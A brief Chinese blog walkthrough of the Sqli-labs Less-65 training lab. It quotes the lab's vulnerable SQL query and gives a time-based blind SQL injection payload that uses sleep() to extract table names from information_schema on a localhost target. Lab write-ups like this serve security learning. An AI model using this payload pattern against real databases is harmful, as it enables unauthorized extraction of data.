Sqli-labs Less-65 延时注入 130次机会

和less62、63、64一致，我们只需要看到sql语句

$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

对id进行了("")的处理，因此构造payload：

http://127.0.0.1/sql/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

当正确的时候时间很短，当错误的时候时间大于10秒

posted @ 2020-04-09 22:57 zhengna 阅读(234) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Sqli-labs Less-65 延时注入 130次机会

公告